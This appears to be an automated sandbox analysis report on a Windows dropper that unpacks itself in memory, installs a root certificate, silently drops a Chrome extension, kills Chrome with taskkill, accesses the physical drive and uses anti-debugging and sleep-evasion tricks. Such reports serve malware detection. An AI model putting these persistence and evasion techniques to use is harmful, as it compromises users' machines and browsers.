Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000017.00000002.295382420.000000000114C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 83C12B0D0FA88B10.exe, 00000002.00000002.311604148.00000000033CC000.00000004.00000001.sdmp, 83C12B0D0FA88B10.exe, 00000004.00000002.277196362.00000000034CC000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: gdiview.msi.0.dr
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IpB8f8qwze.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeUnpacked PE file: 2.2.83C12B0D0FA88B10.exe.2720000.3.unpack
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeUnpacked PE file: 4.2.83C12B0D0FA88B10.exe.2650000.5.unpack
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042D33A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0042D33A
Source: 83C12B0D0FA88B10.exe.0.drStatic PE information: real checksum: 0x17b848 should be: 0x4af12c
Source: MSI75EE.tmp.1.drStatic PE information: real checksum: 0x0 should be: 0x2d22
Source: IpB8f8qwze.exeStatic PE information: real checksum: 0x17b848 should be: 0x4af12c
Source: IpB8f8qwze.exeStatic PE information: section name: .wixburn
Source: 83C12B0D0FA88B10.exe.0.drStatic PE information: section name: .wixburn
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_0042A695 push ecx; ret 0_2_0042A6A8
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_100105D9 push ecx; ret 0_2_100105EC
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: 2_2_100105D9 push ecx; ret 2_2_100105EC
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040E2F1 push ecx; ret 9_2_0040E301
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E354
Source: C:\Users\user\AppData\Roaming\1615173766196.exeCode function: 9_2_0040E340 push eax; ret 9_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 23_2_01143FB5 push ecx; ret 23_2_01143FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D840
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DAD0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D3D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D840
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DAD0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D3D0
Installs new ROOT certificates
Source: C:\Users\user\Desktop\IpB8f8qwze.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Blob
Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI75EE.tmp
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Roaming\1615173766196.exe
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\Desktop\IpB8f8qwze.exeFile created: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon.png
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\icon48.png
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.html
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\background.js
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\book.js
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\jquery-1.8.3.min.js
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\popup.js
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oolpjlhdalgpgokjjheophhfbccgopcg\1.0.0.0_0\manifest.json

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d0_2_1001D840
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,FindCloseChangeNotification, \\.\PhysicalDrive%d0_2_1001DAD0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d0_2_1001D3D0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d2_2_1001D840
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d2_2_1001DAD0
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exeCode function: wsprintfW,CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d2_2_1001D3D0
Source: C:\Users\user\Desktop\IpB8f8qwze.exeCode function: 0_2_00429765 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00429765
Source: C:\Windows\SysWOW64\msiexec.exe; Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\msiexec.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1615173766196.exe; Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10020600
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10020600
Uses ping.exe to sleep
Source: unknown; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_engine.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dll
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dll
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10020600
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10020600
Source: C:\Users\user\Desktop\IpB8f8qwze.exe TID: 6572; Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe TID: 6908; Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe TID: 6980; Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; File opened: PhysicalDrive0
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_004306F1 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 0043078Ch
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_004306F1 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00430785h
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10022710 GetLocalTime followed by cmp: cmp dword ptr [ebp-000002a0h], 06h and CTI: ja 10022C96h
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00436AF7 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0043740C GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,GetLastError,GetLastError,GetLastError,FindClose
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00413414 FindFirstFileW,lstrlenW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_1001A1D0 FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_1001A1D0 FindFirstFileA,FindClose
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Users\user\AppData\Roaming\1615173766196.exe; Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_1001A050 GetCurrentProcess,CheckRemoteDebuggerPresent
Hides threads from debuggers
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Process queried: DebugPort
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Process queried: DebugObjectHandle
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Process queried: DebugFlags
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042A845 IsDebuggerPresent
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042D33A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042D33A EncodePointer,EncodePointer,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_004279FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10019E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10019F30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10019E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10019F30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00431078 GetProcessHeap,HeapAlloc
Source: C:\Windows\SysWOW64\taskkill.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042A5C4 SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042A5E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe; Code function: 23_2_0114631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe; Code function: 23_2_0114373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe; Code function: 23_2_0114461F SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe; Code function: 23_2_01141C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_00432C36 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_004360F6 AllocateAndInitializeSid,CheckTokenMembership
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_0042AA43 cpuid
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_10017D50 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Code function: 2_2_10017D50 GetLocaleInfoA
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe; Code function: 23_2_01147189 GetLocaleInfoA
Source: C:\Users\user\Desktop\IpB8f8qwze.exe; Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA
Source: C:\Windows\SysWOW64\msiexec.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\83C12B0D0FA88B10.exe; Queries volume information: C:\ VolumeInformation
